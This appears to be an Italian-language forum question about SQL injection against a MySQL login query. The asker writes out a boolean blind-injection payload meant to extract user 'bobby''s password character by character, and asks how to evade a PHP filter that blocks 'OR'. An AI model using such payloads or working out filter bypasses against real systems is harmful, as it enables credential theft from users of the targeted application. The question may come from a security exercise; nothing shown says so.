Ho la seguente query MySQL suscettibile di un'iniezione e ho bisogno di estrarre la password di un determinato utente:
SELECT * FROM users WHERE login='$login' and password='$password'
Tuttavia dall'iniezione, posso vedere che prima che la richiesta venga pubblicata, i campi $login
e $password
vengono filtrati. In particolare, gli script PHP rilevano "OR" utilizzato nella seguente iniezione:
login => ' || ''='
password => ' || login='bobby' && passwORd LIKE 'A%'
SELECT * FROM users WHERE login='' || ''='' && password='' || login='bobby' && passwORd LIKE 'A%''
Viene rilevato "OR" visualizzato in $password
e l'iniezione fallisce.
C'è un modo noto per aggirare questo?